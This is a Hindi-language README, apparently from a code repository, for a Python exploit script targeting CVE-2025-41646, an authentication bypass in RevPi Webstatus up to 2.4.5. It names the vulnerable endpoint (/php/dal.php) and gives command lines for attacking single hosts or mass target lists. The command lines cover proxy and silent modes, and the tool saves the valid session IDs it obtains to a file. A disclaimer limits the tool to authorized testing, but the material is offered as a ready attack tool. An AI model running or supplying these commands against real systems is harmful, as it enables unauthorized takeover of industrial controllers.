
CVE-2025-41646 के लिए Python शोषण स्क्रिप्ट, RevPi Webstatus <= 2.4.5 में प्रमाणीकरण बायपास। एकल/सामूहिक शोषण, प्रॉक्सी, साइलेंट मोड, और पेनिट्रेशन टेस्टिंग के लिए JSON आउटपुट का समर्थन करता है।
यह CVE-2025-41646 के लिए एक Python3 शोषण स्क्रिप्ट है, जो RevPi Webstatus <= 2.4.5 को प्रभावित करने वाली प्रमाणीकरण बाईपास कमजोरी है।
/php/dal.php पर दूरस्थ HTTP POST अनुरोधpip install -r requirements.txt
requests
urllib3 (आमतौर पर requests के साथ आता है)
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100"
python3 cve_2025_41646_auth_bypass.py -l targets.txt
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --proxy "http://127.0.0.1:8080"
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --silent
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --json
अनुरोध/प्रतिक्रिया
यह उपकरण केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए है। स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध अनधिकृत उपयोग अवैध है।
| विकल्प | विवरण |
|---|
-u, --url | लक्ष्य URL (जैसे, http://IP) |
-l, --list | लक्ष्यों की सूची वाली फ़ाइल |
-o, --output | मान्य सत्र आईडी सहेजने के लिए आउटपुट फ़ाइल |
--proxy | प्रॉक्सी का उपयोग करें (http://127.0.0.1:8080) |
--json | कच्चा JSON आउटपुट प्रिंट करें |
--silent | मूक मोड (केवल सत्र आईडी प्रिंट करता है) |